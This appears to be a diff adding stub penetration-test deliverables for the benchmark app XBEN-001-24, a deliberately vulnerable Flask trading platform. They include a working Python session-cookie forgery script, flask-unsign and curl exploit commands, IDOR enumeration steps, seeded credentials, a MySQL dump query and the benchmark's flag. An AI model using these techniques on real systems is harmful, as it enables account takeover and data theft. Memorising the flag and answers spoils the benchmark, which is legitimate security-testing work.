+2. Caching proxy stores the response under a URL-only cache key (ignoring `Vary: Cookie`)
+3. Unauthenticated attacker requests the same URL
+4. Cache returns the stored authenticated receipt (containing the application flag) without credential check
+
+**Expected Impact:**
+Flag disclosure and authenticated data exposure to unauthenticated users via cache hit.
+
+---
+
+### AUTH-VULN-03: Plaintext Password Storage (External Impact: Amplified Brute Force Speed)
+
+**Summary:**
+- **Vulnerable location:** `app/website/app/models.py:8`, `app/website/app/routes.py:25`
+- **Current Blocker:** Direct exploitation (reading plaintext passwords from database) requires MySQL internal network access (port 3306, Docker internal only — not externally accessible).
+- **Potential Impact:** An attacker with DB access can immediately read all user passwords in plaintext with zero cracking effort.
+- **Confidence:** HIGH (vulnerability existence confirmed via code analysis; DB access path is blocked externally)
+
+**Evidence of Vulnerability:**
+```python
+# models.py line 8 — plaintext string column
+password = db.Column(db.String(100))
+
+# routes.py line 25 — plaintext comparison (no hash check)
+user = User.query.filter_by(username=username, password=password).first()
+```
+
+**Externally Observable Impact (Confirmed):**
+Timing analysis confirms no bcrypt protection on the login endpoint:
+```
+Wrong password response times: avg 1.309s  (network latency only)
+Correct password response times: avg 1.250s (network latency only)
+Delta: ~0.059s — NO bcrypt timing penalty (bcrypt would add 100-200ms minimum)
+```
+
+This amplifies AUTH-VULN-02: without bcrypt delay, brute force attempts are limited only by network latency, not computation. A typical bcrypt-protected endpoint would cost 100-200ms per attempt; this endpoint costs ~1.2s (network round-trip only).
+
+**How This Would Be Exploited (If DB Access Available):**
+```sql
+-- Internal MySQL connection:
+mysql -h db -u root -p'idor_broken_authz_trading_platform' database
+SELECT username, password FROM user;
+-- Returns all user:password pairs in plaintext, immediately usable for authentication
+```
+
+**Expected Impact:**
+Instant credential harvest for all users — every account compromised without any cracking.

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/auth_exploitation_queue.json
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/auth_exploitation_queue.json
@@ -1,0 +1,112 @@
+{
+  "vulnerabilities": [
+    {
+      "ID": "AUTH-VULN-01",
+      "vulnerability_type": "Token_Management_Issue",
+      "externally_exploitable": true,
+      "source_endpoint": "POST /xben-001-24/",
+      "vulnerable_code_location": "app/website/app/__init__.py:13",
+      "missing_defense": "Flask SECRET_KEY is hardcoded as the literal string 'your_secret_key' — publicly known from source code. Any attacker can use flask-unsign to forge a valid session cookie for any user_id entirely offline without interacting with the login endpoint.",
+      "exploitation_hypothesis": "An attacker can generate a fully valid Flask session cookie for any user_id (e.g., user_id=10032 for the test user) using flask-unsign with the known secret, then use that forged cookie to gain authenticated access to all protected endpoints without supplying any credentials.",
+      "suggested_exploit_technique": "session_fixation",
+      "confidence": "High",
+      "notes": "Forge command: flask-unsign --sign --cookie '{\"user_id\": 10032}' --secret 'your_secret_key'. Live session cookie structure confirmed: eyJ1c2VyX2lkIjoxMDAzMn0.<timestamp>.<hmac>. No itsdangerous version pinning or key rotation mechanism exists. Combined with no server-side revocation (AUTH-VULN-07), forged tokens are valid indefinitely."
+    },
+    {
+      "ID": "AUTH-VULN-02",
+      "vulnerability_type": "Abuse_Defenses_Missing",
+      "externally_exploitable": true,
+      "source_endpoint": "POST /xben-001-24/",
+      "vulnerable_code_location": "app/website/app/routes.py:19-31",
+      "missing_defense": "No rate limiting, CAPTCHA, account lockout, or failed-attempt monitoring on the login endpoint. Empirically confirmed: 6 rapid failed login attempts all returned HTTP 200 with no rate-limit headers (x-ratelimit-limit, retry-after absent). No WAF-level throttle observed.",
+      "exploitation_hypothesis": "An attacker can send unlimited login attempts to POST /xben-001-24/ without being throttled or locked out, enabling successful brute-force of any account's password or credential-stuffing with a known wordlist.",
+      "suggested_exploit_technique": "brute_force_login",
+      "confidence": "High",
+      "notes": "Plaintext password storage (AUTH-VULN-03) means no bcrypt timing resistance. Default credentials test:test disclosed in HTML source (AUTH-VULN-04). All combined make rapid credential confirmation trivial. No ingress-level WAF rate limiting observed in response headers."
+    },
+    {
+      "ID": "AUTH-VULN-03",
+      "vulnerability_type": "Login_Flow_Logic",
+      "externally_exploitable": true,
+      "source_endpoint": "POST /xben-001-24/",
+      "vulnerable_code_location": "app/website/app/routes.py:25 and app/website/app/models.py:8",
+      "missing_defense": "Passwords are stored as plaintext strings (db.Column(db.String(100))) and compared directly via SQLAlchemy filter_by(username=username, password=password). No one-way hashing (bcrypt, PBKDF2, argon2) is applied. Any database read or secondary breach instantly exposes all user credentials.",
+      "exploitation_hypothesis": "An attacker who obtains database access (e.g., via the known DB credentials root/idor_broken_authz_trading_platform) can immediately read all user passwords in plaintext and authenticate to the application as any user without any cracking effort.",
+      "suggested_exploit_technique": "credential_stuffing",
+      "confidence": "High",
+      "notes": "DB credentials are also hardcoded: __init__.py:18 os.environ.get('DB_PASSWORD', 'idor_broken_authz_trading_platform'). MySQL is internal-only so DB access requires internal network — but the plaintext passwords amplify the impact of AUTH-VULN-01 (forged cookie) since discovered credentials enable direct login too. External impact: no bcrypt timing protection amplifies brute-force speed."
+    },
+    {
+      "ID": "AUTH-VULN-04",
+      "vulnerability_type": "Login_Flow_Logic",
+      "externally_exploitable": true,
+      "source_endpoint": "POST /xben-001-24/",
+      "vulnerable_code_location": "app/website/app/__init__.py:39-42",
+      "missing_defense": "Default credentials (test:test, user_id=10032) are seeded unconditionally at application startup. The public login page HTML also contains the comment <!-- TODO: Delete the testing account (test:test). --> confirming the credentials to any unauthenticated visitor. No mechanism exists to disable or rotate these credentials.",
+      "exploitation_hypothesis": "An unauthenticated attacker can view the login page source, discover the hardcoded test:test credentials in the HTML comment, and immediately authenticate to gain full user-level session access without any guessing or brute-force.",
+      "suggested_exploit_technique": "credential_stuffing",
+      "confidence": "High",
+      "notes": "HTML comment confirmed live on GET https://benchmarks.opsmx.org/xben-001-24/. Login with test:test confirmed to return HTTP 302 with valid session cookie. user_id=10032 grants access to all authenticated routes including the IDOR receipt endpoint."
+    },
+    {
+      "ID": "AUTH-VULN-05",
+      "vulnerability_type": "Transport_Exposure",
+      "externally_exploitable": true,
+      "source_endpoint": "GET /xben-001-24/order/<int:order_id>/receipt",
+      "vulnerable_code_location": "app/website/app/routes.py:8-14",
+      "missing_defense": "The add_header after-request hook assigns Cache-Control twice: line 10 sets 'no-cache, no-store, must-revalidate' but line 13 immediately overwrites it with 'public, max-age=0'. The effective header on every response is Cache-Control: public, max-age=0. Confirmed live on all endpoints including authenticated receipt responses containing sensitive data.",
+      "exploitation_hypothesis": "A network-positioned attacker or shared proxy/CDN node can cache authenticated receipt responses (including the flag) under the public, max-age=0 directive, then serve those cached responses to subsequent requests without requiring the original session credentials.",
+      "suggested_exploit_technique": "session_hijacking",
+      "confidence": "High",
+      "notes": "Live confirmed: curl and Playwright both show 'cache-control: public, max-age=0' on GET /, POST /, and GET /order/300401/receipt. The pragma: no-cache and expires: 0 headers are present but Cache-Control takes precedence. Exploitability depends on presence of a caching proxy between client and server."
+    },
+    {
+      "ID": "AUTH-VULN-06",
+      "vulnerability_type": "Session_Management_Flaw",
+      "externally_exploitable": true,
+      "source_endpoint": "POST /xben-001-24/",
+      "vulnerable_code_location": "app/website/app/__init__.py (no SESSION_COOKIE_SECURE = True configured)",
+      "missing_defense": "No SESSION_COOKIE_SECURE directive is set in app config. Flask defaults to Secure=False. Live confirmed: Set-Cookie header is 'session=...; HttpOnly; Path=/' with no Secure attribute. HTTP port responds with HTTP 307 redirect to HTTPS — meaning any browser with a stored session cookie will transmit it over plaintext HTTP before the redirect, enabling interception by a network-positioned attacker.",
+      "exploitation_hypothesis": "A network-positioned attacker (e.g., on the same Wi-Fi network as the victim) can intercept the session cookie transmitted in the plaintext HTTP request that precedes the 307 redirect to HTTPS, then replay that cookie to hijack the victim's authenticated session.",
+      "suggested_exploit_technique": "session_hijacking",
+      "confidence": "High",
+      "notes": "HTTP 307 redirect confirmed live: http://benchmarks.opsmx.org/xben-001-24/ returns 307 Location: https://benchmarks.opsmx.org/xben-001-24/. HSTS (max-age=31536000) mitigates for repeat HTTPS visitors in supporting browsers, but does not protect first-time HTTP visitors or browsers that have cleared HSTS state. Playwright confirmed secure: false in cookie object."
+    },
+    {
+      "ID": "AUTH-VULN-07",
+      "vulnerability_type": "Session_Management_Flaw",
+      "externally_exploitable": true,
+      "source_endpoint": "POST /xben-001-24/logout",
+      "vulnerable_code_location": "app/website/app/routes.py:35-39",
+      "missing_defense": "Logout only calls session.pop('user_id', None) on the client-side Flask cookie. No server-side session store exists, so there is no mechanism to blacklist or revoke an issued token. Empirically confirmed: a session cookie captured before logout was replayed after logout and returned HTTP 200 with authenticated dashboard content.",
+      "exploitation_hypothesis": "An attacker who steals a victim's session cookie (via network interception, XSS, or AUTH-VULN-01 forgery) can continue to use it indefinitely, even after the victim has logged out — the stolen session remains valid with no expiration until the SECRET_KEY changes.",
+      "suggested_exploit_technique": "token_replay",
+      "confidence": "High",
+      "notes": "Live confirmed: cookie captured with one curl request, victim logged out via POST /logout, old cookie replayed against GET /dashboard returned HTTP 200. No Set-Cookie clearing header was observed in the logout response to invalidate client side either. This is compounded by AUTH-VULN-08 (no timeout)."
+    },
+    {
+      "ID": "AUTH-VULN-08",
+      "vulnerability_type": "Session_Management_Flaw",
+      "externally_exploitable": true,
+      "source_endpoint": "POST /xben-001-24/",
+      "vulnerable_code_location": "app/website/app/__init__.py (no PERMANENT_SESSION_LIFETIME configured)",
+      "missing_defense": "No PERMANENT_SESSION_LIFETIME or SESSION_PERMANENT is set. Flask defaults to browser-session lifetime (expires=-1). No idle timeout or absolute session expiration is enforced. Live confirmed via Playwright cookie inspection: expires: -1 (no expiry). Sessions persist indefinitely within a browser session.",
+      "exploitation_hypothesis": "An attacker with a stolen or forged session cookie can maintain authenticated access indefinitely — the session never expires server-side and has no client-side TTL beyond browser closure — enabling long-lived persistence after initial compromise.",
+      "suggested_exploit_technique": "token_replay",
+      "confidence": "High",
+      "notes": "Compounded by AUTH-VULN-07 (no server-side revocation). The combination of unlimited session lifetime, no server-side invalidation, and a known signing key (AUTH-VULN-01) means a single forged or captured token provides permanent access. No absolute session timeout observed in any response."
+    },
+    {
+      "ID": "AUTH-VULN-09",
+      "vulnerability_type": "Login_Flow_Logic",
+      "externally_exploitable": true,
+      "source_endpoint": "POST /xben-001-24/",
+      "vulnerable_code_location": "app/website/app/routes.py:28",
+      "missing_defense": "After successful login, the application redirects to /xben-001-24/dashboard?username=<username>, embedding the authenticated username as a URL query parameter. Usernames appear in server access logs, browser history, and Referer headers sent to any third-party resources loaded on the dashboard page.",
+      "exploitation_hypothesis": "An attacker with access to server logs, network-layer logging, or browser history of a victim can passively harvest valid usernames from the redirect URL pattern, enabling targeted credential attacks against known-valid accounts.",
+      "suggested_exploit_technique": "account_enumeration",
+      "confidence": "Medium",
+      "notes": "Live confirmed: POST /xben-001-24/ returns 302 Location: /xben-001-24/dashboard?username=test. The username is also not used by the dashboard template (dashboard.html uses user.first_name from DB, not the query param), making this exposure purely informational but still a security anti-pattern. Low direct auth bypass risk; useful for reconnaissance in targeted attacks."
+    }
+  ]
+}

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/authz_analysis_deliverable.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/authz_analysis_deliverable.md
@@ -1,0 +1,141 @@
+# Authorization Analysis Report
+## Target: XBEN-001-24 — Flask Stock Trading Platform
+## Analyst: Authorization Analysis Specialist
+## Date: 2026-05-20
+
+---
+
+## 1. Executive Summary
+
+- **Analysis Status:** Complete
+- **Key Outcome:** Two high-confidence authorization vulnerabilities were identified and confirmed through direct source code analysis. One horizontal (IDOR) and one vertical (authentication bypass via session forgery) vulnerability are passed to the exploitation phase. All remaining endpoints are confirmed secure by design.
+- **Purpose of this Document:** This report provides the strategic context, dominant patterns, and architectural intelligence necessary to effectively exploit the vulnerabilities listed in the queue. It is intended to be read alongside the machine-readable exploitation queue captured at session end.
+
+**Findings Summary:**
+
+| ID | Type | Endpoint | Confidence |
+|----|------|----------|------------|
+| AUTHZ-VULN-01 | Horizontal | `GET /order/<int:order_id>/receipt` | High |
+| AUTHZ-VULN-02 | Vertical | All authenticated routes (session forgery) | High |
+
+---
+
+## 2. Dominant Vulnerability Patterns
+
+### Pattern 1: Missing Ownership Validation (Horizontal)
+
+- **Description:** The receipt endpoint accepts an integer `order_id` URL parameter and queries the database purely by primary key (`Order.query.get(order_id)`), without ever comparing `order.user_id` to the session's `user_id`. The `Order` model carries a `user_id` FK column (`models.py:25`) that could enforce ownership, but it is **never consulted** in the receipt route handler.
+- **Implication:** Any authenticated user can enumerate integer order IDs and retrieve the receipt of any order in the database — including Order ID 300401 which contains the application flag (`flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`). Order 300401 has a NULL `user_id` FK (intentionally ownerless), making it universally accessible to any session.
+- **Representative:** AUTHZ-VULN-01
+
+### Pattern 2: Hardcoded Cryptographic Secret Enabling Authentication Bypass (Vertical)
+
+- **Description:** The Flask application's session signing key is hardcoded as `app.secret_key = 'your_secret_key'` (`__init__.py:13`). Flask uses this key (via itsdangerous HMAC-SHA1) to sign client-side session cookies. Since the key is publicly known, any external party can forge a valid session cookie for an arbitrary `user_id` without credentials.
+- **Implication:** An unauthenticated attacker can construct a valid Flask session cookie for any `user_id` (including user_id=10001 for admin) using `flask-unsign` or itsdangerous directly. This bypasses the only authentication guard (`session.get('user_id')`) present on all protected routes, enabling anon→user privilege escalation without credentials. It also acts as a horizontal amplifier: forging a session for a specific `user_id` then using the IDOR gives full cross-user data access without knowing any credentials.
+- **Representative:** AUTHZ-VULN-02
+
+---
+
+## 3. Strategic Intelligence for Exploitation
+
+### Session Management Architecture
+
+- **Cookie Format:** Flask itsdangerous signed cookie. Payload: `{"user_id": <int>}`, base64-encoded and signed with HMAC-SHA1 using `SECRET_KEY = 'your_secret_key'`.
+- **Cookie Flags:** `HttpOnly` set; `Secure` flag NOT set in application source (TLS enforced at ingress level only). Cookie is a browser-session cookie (no `PERMANENT_SESSION_LIFETIME` configured).
+- **Cookie Example (live):** `eyJ1c2VyX2lkIjoxMDAzMn0.ag1jqg.hbgyJtD9a9fz5xMasB3Q-HYdBzE` → decoded: `{"user_id": 10032}` (test user)
+- **Critical Finding:** The SECRET_KEY is trivially known. Forge any session with: `flask-unsign --sign --cookie '{"user_id": <ID>}' --secret 'your_secret_key'`
+
+### Role/Permission Model
+
+- **Two roles identified:** `anon` (unauthenticated) and `user` (authenticated, `session['user_id']` set).
+- **No admin-specific routes:** The `admin` user (user_id: 10001, credentials: `admin:admin`) exists in the database but has **identical route-level access** to regular users. No route checks for admin role.
+- **Role checks:** Inline `if user_id:` check at each route handler in `routes.py`. No centralized middleware, no decorator pattern, no Flask-Login or similar framework.
+- **Critical Finding:** Role checks only verify authentication (session exists), never authorization (do you own this resource?).
+
+### Resource Access Patterns
+
+- The only resource-parameterized endpoint is `GET /order/<int:order_id>/receipt` (integer path parameter).
+- Flask `<int:>` converter enforces integer type — no type confusion possible, but any integer in valid range is accepted.
+- Known order ID range: ~300000–300999 based on seeded data. Flag at ID 300401 (confirmed via live test).
+- Orders page (`/orders`) leaks order IDs of the current user in DOM via `data-receipt-url` attributes — provides valid ID anchors for enumeration.
+- **Critical Finding:** ID parameter is passed directly to `Order.query.get(order_id)` with no ownership filter.
+
+### Database Schema (Authorization-Relevant)
+
+- `order` table: `id` (PK), `date`, `ticker`, `operation_type`, `quantity`, `price`, `receipt`, `user_id` (FK, nullable).
+- Order 300401: `user_id = NULL`, `receipt = flag_content`, `ticker = 'FLAG'` — the flag order has no owner, making it accessible to any authenticated session.
+- The `user.orders` SQLAlchemy relationship correctly scopes orders on the `/orders` route but is bypassed entirely by the direct receipt endpoint.
+
+### Known Credentials
+
+- `test:test` → user_id=10032
+- `admin:admin` → user_id=10001 (no additional privileges at route level)
+
+---
+
+## 4. Vectors Analyzed and Confirmed Secure
+
+These authorization checks were traced to the code level and confirmed to have robust, properly-placed guards. They are **low-priority** for further testing.
+
+| **Endpoint** | **Guard Location** | **Defense Mechanism** | **Verdict** |
+|---|---|---|---|
+| `GET /dashboard` | `routes.py:46-52` | `session.get('user_id')` auth check; `User.query.get(user_id)` uses session-derived ID — no URL parameter manipulation possible | SAFE |
+| `GET /orders` | `routes.py:59-65` | `session.get('user_id')` auth check; `user.orders` SQLAlchemy relationship filters via `WHERE order.user_id = <session_user_id>` — ownership enforced by FK join | SAFE |
+| `POST /logout` | `routes.py:35-39` | `session.pop('user_id', None)` — no sensitive data exposed; auth check not required by design (logout is safe to call in any state) | SAFE |
+| `GET /` (login form) | `routes.py:19-31` | Public endpoint by design; no auth required; ORM parameterized query prevents SQLi | SAFE |
+| `POST /` (login) | `routes.py:22-31` | Public credential submission; ORM prevents SQLi; no authorization bypass possible | SAFE |
+| `GET /static/*` | Flask static file serving | Static assets (CSS/JS); no auth required by design; no sensitive data | SAFE |
+
+**Context/Workflow finding (Section 8.3 of recon):** The "direct URL access bypasses navigation intent" finding does not constitute a standalone context/workflow authorization vulnerability. The receipt endpoint is a single atomic read — there is no multi-step workflow with state transitions, status flags, stage tokens, or nonces that need prior-state validation. The referrer-based navigation expectation is a UI pattern, not a security boundary (referrer headers are optional and strippable). This finding collapses entirely into AUTHZ-VULN-01 (the horizontal IDOR).
+
+---
+
+## 5. Analysis Constraints and Blind Spots
+
+- **Single-File Application:** All route logic is in `routes.py` (84 lines). No microservices, no internal API calls — analysis is complete with no untraced code paths.
+- **No Middleware Framework:** The application uses no Flask-Login, Flask-Principal, or similar extension. All authorization is inline per-route — no shared middleware to miss.
+- **Static Database Seeding:** The flag order (300401) is seeded at application startup from `/flag` file. The ID is fixed and does not rotate.
+- **No Runtime Permission Checks:** There are no dynamic permission checks loaded from the database at runtime. Authorization is entirely code-based (static analysis is complete).
+- **Session Forgery Precondition:** AUTHZ-VULN-02 requires the ability to set a crafted `Cookie` header. This is trivially achievable from any HTTP client (curl, browser DevTools, Burp Suite).
+
+---
+
+## 6. Exploitation Queue
+
+### AUTHZ-VULN-01 — Horizontal IDOR: Order Receipt Disclosure
+
+```json
+{
+  "ID": "AUTHZ-VULN-01",
+  "vulnerability_type": "Horizontal",
+  "externally_exploitable": true,
+  "endpoint": "GET /xben-001-24/order/<int:order_id>/receipt",
+  "vulnerable_code_location": "routes.py:79",
+  "role_context": "user (any authenticated session, including forged cookies)",
+  "guard_evidence": "No ownership check — 'Order.query.get(order_id)' fetches by PK only. The Order model has a 'user_id' FK (models.py:25) that is never compared to 'session[\"user_id\"]' anywhere in the receipt handler. The only guard is 'session.get(\"user_id\")' (routes.py:72) which checks authentication, not authorization.",
+  "side_effect": "Read the receipt field of any order in the database by supplying an arbitrary integer order_id. Order ID 300401 returns the application flag: flag{85c0d827-5e28-4577-be2b-319bdcbf872d}.",
+  "reason": "The receipt route enforces authentication (session must exist) but applies no ownership check. 'Order.query.get(order_id)' is a pure PK lookup — any integer is accepted regardless of which user placed the order. The 'user_id' FK on the Order model is present but completely ignored in this handler.",
+  "minimal_witness": "1) Login as test:test to obtain a session cookie. 2) Send: GET /xben-001-24/order/300401/receipt with that session cookie. 3) Response contains the flag. Alternatively enumerate IDs 300000-300999 to discover all orders.",
+  "confidence": "high",
+  "notes": "Order 300401 has user_id=NULL (no owner) making it accessible to all authenticated sessions. The flag value is confirmed: flag{85c0d827-5e28-4577-be2b-319bdcbf872d}. No rate limiting or anomaly detection present. AUTHZ-VULN-02 can be used to exploit this without any credentials at all."
+}
+```
+
+### AUTHZ-VULN-02 — Vertical: Authentication Bypass via Hardcoded Flask SECRET_KEY
+
+```json
+{
+  "ID": "AUTHZ-VULN-02",
+  "vulnerability_type": "Vertical",
+  "externally_exploitable": true,
+  "endpoint": "GET /xben-001-24/dashboard, GET /xben-001-24/orders, GET /xben-001-24/order/<int:order_id>/receipt (all authenticated routes)",
+  "vulnerable_code_location": "__init__.py:13",
+  "role_context": "anon (unauthenticated attacker with no credentials)",
+  "guard_evidence": "app.secret_key = 'your_secret_key' is hardcoded and publicly known. All authentication guards on protected routes check 'session.get(\"user_id\")' (routes.py:46, 59, 72), which accepts any itsdangerous-signed cookie using this key. No server-side session store exists — the signed cookie IS the authentication proof.",
+  "side_effect": "Unauthenticated attacker bypasses all authentication guards on protected routes by submitting a forged Flask session cookie. Attacker can impersonate any user_id (including admin user_id=10001) and access all authenticated-only functionality. Combined with AUTHZ-VULN-01, attacker can read any order receipt without credentials.",
+  "reason": "The Flask SECRET_KEY is hardcoded as the literal string 'your_secret_key' (__init__.py:13). This key is the sole cryptographic basis for session integrity. Since it is publicly known, any party can generate valid session signatures for arbitrary payloads using flask-unsign or itsdangerous directly, completely defeating the session authentication mechanism.",
+  "minimal_witness": "1) Run: flask-unsign --sign --cookie '{\"user_id\": 10032}' --secret 'your_secret_key' to generate forged cookie. 2) Submit forged cookie in 'Cookie: session=<forged>' header to any protected endpoint. 3) Endpoint responds as if authenticated. 4) Chain with AUTHZ-VULN-01 to read any order receipt without any real credentials.",
+  "confidence": "high",
+  "notes": "No admin-specific routes exist — impersonating admin (user_id=10001) grants no additional route-level privileges beyond any regular user. The primary exploit value of this vulnerability is: (a) bypass auth without credentials entirely, (b) impersonate specific users to appear as their user_id when combined with IDOR. Credentials test:test and admin:admin are also known from seeded data, so AUTHZ-VULN-02 is a secondary vector for exploitation — but critical for a zero-credential attack scenario."
+}
+```

--- a/charts/ssd/config/toolchain/shannon-stub-deliverables/authz_exploitation_evidence.md
+++ b/charts/ssd/config/toolchain/shannon-stub-deliverables/authz_exploitation_evidence.md
@@ -1,0 +1,231 @@
+# Authorization Exploitation Evidence
+
+**Target:** https://benchmarks.opsmx.org/xben-001-24/
+**Assessment Date:** 2026-05-20
+**Assessor Role:** Authorization Exploitation Specialist
+**Scope:** External network — public interface only
+
+---
+
+## Successfully Exploited Vulnerabilities
+
+### AUTHZ-VULN-02: Authentication Bypass via Hardcoded Flask SECRET_KEY
+
+**Summary:**
+- **Vulnerable location:** Flask application `__init__.py:13` — `app.secret_key = 'your_secret_key'`; all protected routes (`/dashboard`, `/orders`, `/order/<id>/receipt`)
+- **Overview:** The Flask application uses a publicly-known, hardcoded secret key (`'your_secret_key'`) to sign all session cookies. Because the signing secret is known, an unauthenticated attacker can craft cryptographically valid session cookies impersonating **any** user — including privileged accounts — and gain full access to the application without supplying credentials.
+- **Impact:** Complete authentication bypass. An attacker can forge a session for any user ID (e.g., `user_id=10001` for admin) and access all authenticated routes as that user without knowing the password. Combined with AUTHZ-VULN-01 (IDOR), this enables unauthorized access to every order receipt in the system.
+- **Severity:** Critical
+
+**Prerequisites:**
+- The hardcoded secret key `'your_secret_key'` (obtained from source code at `benchmarks/XBEN-001-24/app/website/app/__init__.py:13`)
+- Python 3 with standard `hmac`, `hashlib`, `base64`, `struct` libraries (no third-party tools required)
+
+**Exploitation Steps:**
+
+1. **Obtain the SECRET_KEY** from source code (or guess from the default):
+   ```
+   SECRET_KEY = 'your_secret_key'
+   ```
+
+2. **Run the following Python 3 cookie-forgery script** (no dependencies beyond stdlib):
+
+   ```python
+   import hmac, hashlib, base64, json, struct, time
+
+   SECRET_KEY = b'your_secret_key'
+   SALT       = b'cookie-session'   # Flask default session salt
+
+   def derive_key(secret, salt):
+       """itsdangerous 'hmac' key derivation"""
+       mac = hmac.new(secret, salt, digestmod=hashlib.sha1)
+       return mac.digest()
+
+   def forge_session_cookie(user_id, secret=SECRET_KEY, salt=SALT):
+       """Forge a valid Flask session cookie for any user_id"""
+       # 1. Serialize payload (TaggedJSONSerializer compatible)
+       payload = json.dumps({"user_id": user_id}, separators=(',', ':')).encode()
+
+       # 2. Base64url-encode payload (no padding)
+       b64_payload = base64.b64encode(payload).rstrip(b'=') \
+                     .replace(b'+', b'-').replace(b'/', b'_').decode()
+
+       # 3. Pack current timestamp as 4-byte big-endian, then base64url-encode
+       ts_bytes = struct.pack(">I", int(time.time()))
+       ts_b64 = base64.b64encode(ts_bytes).rstrip(b'=') \
+                .replace(b'+', b'-').replace(b'/', b'_').decode()
+
+       # 4. Compute HMAC-SHA1 over payload.timestamp
+       value       = f"{b64_payload}.{ts_b64}"
+       derived_key = derive_key(secret, salt)
+       sig         = hmac.new(derived_key, msg=value.encode(), digestmod=hashlib.sha1).digest()
+       b64_sig     = base64.b64encode(sig).rstrip(b'=') \
+                     .replace(b'+', b'-').replace(b'/', b'_').decode()
+
+       return f"{value}.{b64_sig}"
+
+   # Forge session for target user (admin = 10001, test user = 10032)
+   cookie = forge_session_cookie(user_id=10001)
+   print(f"Forged cookie: {cookie}")
+   ```
+
+3. **Inject the forged session cookie** into any HTTP request — no prior login required:
+
+   ```bash
+   FORGED_COOKIE="<output from step 2>"
+
+   curl -s -H "Cookie: session=$FORGED_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/dashboard"
+   ```
+
+4. **Observe HTTP 200 response** — the application treats the forged session as a fully authenticated session for `user_id=10001`:
+
+   ```
+   HTTP/2 200
+   <title>Dashboard - Trading Platform</title>
+   ```
+
+5. **Access protected resources with the forged session** (e.g., order receipts via IDOR — see AUTHZ-VULN-01):
+
+   ```bash
+   curl -s -H "Cookie: session=$FORGED_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/order/300401/receipt"
+   ```
+
+**Proof of Impact:**
+
+| Cookie Type | user_id | HTTP Status on /dashboard | Credentials Used |
+|-------------|---------|--------------------------|-----------------|
+| Legitimate (test login) | 10032 | 200 | username=test, password=test |
+| **Forged (no login)** | **10001 (admin)** | **200** | **None — no credentials** |
+| **Forged (no login)** | **10032 (test)** | **200** | **None — no credentials** |
+
+Confirmed forged cookies:
+- Admin (`user_id=10001`): `eyJ1c2VyX2lkIjoxMDAwMX0.ag1reQ.0WgSLZxwNmew9wEW1SB2SrxEeUk` → HTTP 200
+- Test user (`user_id=10032`): `eyJ1c2VyX2lkIjoxMDAzMn0.ag1rkg.NaEpS5HMTEgT2TLLh-4SHi2m8Ck` → HTTP 200
+
+**Technical Root Cause:**
+Flask's `SecureCookieSessionInterface` uses `itsdangerous.URLSafeTimedSerializer` to sign cookies. The security of this scheme depends entirely on the secrecy of the `SECRET_KEY`. The application hardcodes it as the literal string `'your_secret_key'` — publicly known — allowing any party with access to the source code (or even common defaults) to forge arbitrary sessions.
+
+**Notes:**
+- The `admin` user (id=10001) does not have a corresponding DB row, so the `/orders` endpoint returns HTTP 500 for forged admin sessions; however, `/dashboard` returns 200 and `/order/<id>/receipt` returns 200 (IDOR still exploitable)
+- The forgery script requires only Python 3 stdlib — no third-party tools needed
+- Cookie re-computation takes < 1ms; the attack is fully automated and scalable
+
+---
+
+### AUTHZ-VULN-01: Insecure Direct Object Reference (IDOR) on Order Receipt Endpoint
+
+**Summary:**
+- **Vulnerable location:** `GET https://benchmarks.opsmx.org/xben-001-24/order/<int:order_id>/receipt` — `routes.py:69-81`
+- **Overview:** The receipt endpoint retrieves an order by the caller-controlled integer `order_id` path parameter without verifying that the authenticated user owns that order. Any authenticated user (including one with a forged session) can read any order's receipt, including Order ID 300401 which contains the system flag.
+- **Impact:** Unauthorized access to all order receipts across all users. Specifically, exfiltration of `flag{85c0d827-5e28-4577-be2b-319bdcbf872d}` from Order 300401 (no user FK — a privileged hidden order).
+- **Severity:** High
+
+**Prerequisites:**
+- An authenticated session (legitimate or forged — see AUTHZ-VULN-02)
+- Knowledge of at least one order ID (predictable integer range: 300000–300999)
+
+**Exploitation Steps:**
+
+1. **Obtain an authenticated session** — login as `test`/`test` or use a forged session cookie:
+
+   ```bash
+   # Option A: Login normally
+   curl -c cookies.txt -X POST \
+     -d "username=test&password=test" \
+     "https://benchmarks.opsmx.org/xben-001-24/"
+
+   # Option B: Use forged session (see AUTHZ-VULN-02)
+   SESSION_COOKIE="eyJ1c2VyX2lkIjoxMDAzMn0.ag1rkg.NaEpS5HMTEgT2TLLh-4SHi2m8Ck"
+   ```
+
+2. **Access your own order receipt to confirm normal behavior** (order 300123 belongs to test user):
+
+   ```bash
+   curl -s -H "Cookie: session=$SESSION_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/order/300123/receipt"
+   # Returns: Order ID: 300123 + Lorem ipsum text
+   ```
+
+3. **Access an order belonging to another user** — order 300401 (no `user_id` FK, hidden/privileged):
+
+   ```bash
+   curl -s -H "Cookie: session=$SESSION_COOKIE" \
+     "https://benchmarks.opsmx.org/xben-001-24/order/300401/receipt"
+   ```
+
+4. **Observe the unauthorized response** — full receipt returned with sensitive flag content:
+
+   ```html
+   <p><strong>Order ID:</strong> 300401</p>
+   <code class="text-white">flag{85c0d827-5e28-4577-be2b-319bdcbf872d}</code>
+   ```
+
+**Proof of Impact:**
+
+Flag exfiltrated from unauthorized order: **`flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`**
+
+IDOR enumeration sweep results (all using session of `user_id=10032`):
+
+| Order ID | Owned by test user? | HTTP Status | Content |
+|----------|--------------------|-----------:|---------|
+| 300123 | YES | 200 | Lorem ipsum receipt (legitimate) |
+| 300214 | YES | 200 | Proin nam fringilla… (legitimate) |
+| 300327 | YES | 200 | Lacus tincidunt… (legitimate) |
+| **300401** | **NO (orphan)** | **200** | **`flag{85c0d827-5e28-4577-be2b-319bdcbf872d}`** |
+| 300481 | YES | 200 | Risus class auctor… (legitimate) |
+
+**Vulnerable Code (routes.py:69-81):**
+
+```python
+@app.route('/order/<int:order_id>/receipt')
+def order_receipt(order_id):
+    user_id = session.get('user_id')
+    if user_id:
+        # VULNERABILITY: No ownership check! Any authenticated user
+        # can retrieve any order's receipt by supplying its ID.
+        order = Order.query.get(order_id)
+        return render_template('receipt.html', order=order)
+    else:
+        return redirect(url_for('login'))
+```
+
